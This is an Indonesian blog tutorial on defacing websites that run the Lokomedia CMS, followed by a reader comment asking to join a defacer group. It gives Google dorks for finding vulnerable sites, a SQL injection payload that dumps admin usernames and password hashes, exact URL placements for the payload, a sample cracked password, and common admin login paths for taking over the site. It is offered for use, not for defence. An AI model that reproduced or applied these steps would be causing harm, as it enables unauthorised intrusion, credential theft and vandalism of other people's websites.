Cara Deface POC Lokmed
Hai guys, kembali lagi di blog terkece terkeren terhitz di Indonesia :v, eh malah kek atta :v, Ok lah tanpa basa basi kita langsung aja ke tutor nya

Bahan - Bahan :
1. Internet
2. Hp / Laptop

Ok guys kalau sudah ada bahan bahan nya langsung aja ke TKP...

Dorking dulu ya bos kalau belum tahu Dorking itu apa nanti saya upload ketika artikel ini sudah di upload

Dork :
- inurl:kategori-23-hiburan.html
- inurl:hal-tentang-kami.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html

Bagi kalian yang sudah tahu apa itu Google Dork bisa kalian kembangin lagi, saya cuman memberikan default nya, ok?

Kalau sudah ketemu target kita eksekusi menggunakan Exploit berikut ini
'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

Bagi kalian yang tidak tahu cara memasukan Exploit nya seperti apa bakalan saya ajarin jadi seperti di bawah ini..
Misal kalian nemuin web/target kek gini website.co.li/statis-1-tentang.html
Nah kita masukin Exploit nya itu di bagian sesudah angka satu itu, nah kalau angka nya beda gimana bang?, Ya nggak papa lu masukin aja Exploit nya di depan angka itu seperti berikut ini
website.co.li/statis-1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-tentang.html
Nah seperti itu caranya,

Nah kelanjutan nya gimana bang?
Ok langsung aja langkah selanjutnya
Kalau sudah kalian lakukan cara diatas langkah selanjutnya adalah kalian view-source website nya yang tadi menggunakan ctrl+u / view-source: website.co.li

Disini saya menggunakan hp jadi pakai chrome caranya
view-source:website.co.li/statis-1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-tentang.html

Maka akan muncul seperti gambar berikut ini
Nah di title nya itu kan ada text + md5 Jadi yang text itu user name nya dan md5 nya itu password nya, terus gimana caranya bang supaya kita tahu apa isi password nya
Kalian tinggal masuk ke website di bawah ini
https://www.md5online.org/md5-decrypt.html
Kalian masukan hash nya
Terus akan muncul text berwarna hijau seperti di bawah ini
Nah yang Found : ftik3nc4n4007 
Itu Password nya, nah gimana cara kita login?
Disini kita bermain feeling :v
Ea feeling
Admin page default nya sih disini
1. web.co.li/index.php/adminweb
2. web.co.li/redaktur
3. we.co.li/administrator
4. web.co.li/adminweb
5. web.co.li/admin

Nah kalian tinggal login deh
Dan boom
Selamat kalian sudah masuk ke dalam server nya
Share To:

NoXLaw [Leader]

Post A Comment:

1 comments so far,Add yours

  1. Waah Salken sesama defacer Dri Pemalang . Bro aja group wa Nya gak? Saya mau join h3h3

    ReplyDelete